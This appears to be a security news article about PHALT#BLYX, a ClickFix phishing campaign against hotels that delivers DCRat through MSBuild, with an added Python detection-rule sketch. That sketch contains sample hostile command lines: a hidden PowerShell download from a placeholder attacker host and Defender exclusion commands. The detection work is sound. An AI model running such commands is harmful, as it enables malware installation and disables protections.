The ClickFix Trap: PHALT#BLYX Uses Fake BSODs to Hijack Hotel Systems
Notifications regarding Booking.com cancellations involving substantial financial transactions appear as mere routine for hospitality providers. Yet, such correspondence serves as the harbinger for a sophisticated malicious campaign tracked by Securonix researchers under the moniker PHALT#BLYX. This operation exemplifies a burgeoning trend where cyberattacks prioritize psychological manipulation and the exploitation of trusted Windows utilities over traditional technical vulnerabilities.
The campaign specifically targets the hospitality sector, and activity surged during the peak holiday season. Victims receive spear-phishing messages concerning purported booking cancellations with payment details denominated in Euros. This artifice fabricates a sense of urgency, compelling the recipient to engage with the provided hyperlink. Instead of the legitimate Booking.com portal, the user is rerouted to a meticulously crafted facsimile, where the aesthetic fidelity—logos, typography, and color palettes—is virtually indistinguishable from the authentic site.
On the fraudulent landing page, the victim encounters a simulated loading error and is prompted to refresh the interface. This interaction triggers a full-screen browser mode that mimics the notorious Windows “Blue Screen of Death” (BSOD). Amidst this heightened stress, the user is offered a simple remedy: invoke the “Run” dialog, paste a pre-copied command, and execute it. In reality, a malicious PowerShell command has already been surreptitiously placed in the system clipboard. Consequently, the user unwittingly initiates the infection, bypassing numerous automated security perimeters.
The assault subsequently unfolds in multiple echelons. The PowerShell script fetches a specialized MSBuild project file and executes it via the native Microsoft build engine. This maneuver is a quintessential “Living off the Land” (LotL) technique; by utilizing a trusted system binary, the attack assumes a veneer of legitimacy that often evades antivirus signatures and application control policies. As a diversionary tactic, the legitimate Booking.com administrative portal is opened in the browser to assuage any lingering suspicions.
The fetched MSBuild project contains embedded code designed to erode the system’s defenses. It systematically adds exclusions to Windows Defender for critical directories and file types, and should administrative privileges be available, it completely deactivates real-time protection. If such privileges are absent, the malware incessantly triggers User Account Control (UAC) prompts, banking on the victim’s eventual capitulation to silence the intrusive pop-ups.
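As an added illustration (not code from the Securonix report), the following Python sketches detection heuristics a SOC could apply to process-creation telemetry for the stages described above: the Run-dialog PowerShell launch, MSBuild used as a loader, and Defender exclusion tampering. The event field names and sample events are constructed, and the download URL is a placeholder.

```python
# Added example: heuristic rules over constructed process-creation events
# modelled on the PHALT#BLYX chain (not real telemetry, not a real EDR schema).
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent image name, lower-case (assumed field)
    image: str    # image name, lower-case (assumed field)
    cmdline: str  # full command line (assumed field)


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Downloads|Public)\\", re.I)
DOWNLOAD_CMD = re.compile(r"\b(iwr|Invoke-WebRequest|curl|wget|DownloadString|DownloadFile)\b", re.I)
DEFENDER_TAMPER = re.compile(r"(Add-MpPreference\s+-Exclusion|Set-MpPreference\s+-DisableRealtimeMonitoring)", re.I)


def classify(ev: ProcEvent) -> list:
    """Return the names of every rule the event matches (empty list = nothing suspicious)."""
    hits = []
    # Run-dialog paste: explorer.exe launches a script host that immediately downloads something.
    if ev.parent == "explorer.exe" and ev.image in SCRIPT_HOSTS and DOWNLOAD_CMD.search(ev.cmdline):
        hits.append("script-host-download-from-explorer")
    # MSBuild as a LotL loader: started by a script host, or building a project from a user-writable path.
    if ev.image == "msbuild.exe" and (ev.parent in SCRIPT_HOSTS or USER_WRITABLE.search(ev.cmdline)):
        hits.append("msbuild-lotl-loader")
    # A build engine should compile, not spawn shells.
    if ev.parent == "msbuild.exe" and ev.image in SCRIPT_HOSTS:
        hits.append("msbuild-spawns-script-host")
    # Defender exclusions or real-time protection being switched off from the command line.
    if DEFENDER_TAMPER.search(ev.cmdline):
        hits.append("defender-tampering")
    return hits


# Constructed sample events; "PLACEHOLDER.example" stands in for the attacker host.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              r'powershell -w hidden -c "iwr http://PLACEHOLDER.example/p.proj -OutFile $env:TEMP\p.proj"'),
    ProcEvent("powershell.exe", "msbuild.exe", r"msbuild.exe C:\Users\u\AppData\Local\Temp\p.proj"),
    ProcEvent("msbuild.exe", "powershell.exe", r"powershell -c Add-MpPreference -ExclusionPath C:\Users\u\AppData"),
    ProcEvent("devenv.exe", "msbuild.exe", r"msbuild.exe C:\src\app\app.csproj /t:Build"),  # benign build
]


def scan(events=SAMPLE_EVENTS) -> dict:
    """Map event index -> matched rule names, keeping only events that triggered something."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```

Running `scan()` flags the first three constructed events and leaves the Visual Studio build untouched; in production the same rules would be expressed in the EDR or SIEM query language rather than Python.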
The definitive payload is a modified iteration of DCRat, a remote access tool deeply entrenched within the Russian-speaking cybercriminal underground. It establishes persistent access by injecting itself into legitimate Windows processes, intercepting keystrokes, exfiltrating system telemetry, and deploying supplementary modules such as cryptocurrency miners. To maintain persistence, the malware utilizes an unorthodox method: placing .url shortcuts within the startup folder that point to local malicious executables.
Researchers have noted the presence of Russian linguistic markers within the debug strings and service metadata of the code. The grammatical precision suggests the involvement of native speakers or the utilization of sophisticated toolkits sourced from clandestine forums. This observation aligns with the selection of DCRat, a staple in that specific criminal ecosystem.
The PHALT#BLYX campaign underscores the lethal synergy between social engineering and LotL methodologies. In these scenarios, traditional signature-based defenses frequently prove inadequate, shifting the burden of security onto user behavior. Experts advise rigorous staff training, a healthy skepticism toward urgent financial communications, and vigilant monitoring of atypical activity within system utilities like MSBuild. In the modern threat landscape, the genesis of a catastrophic security breach is often concealed within these seemingly mundane details.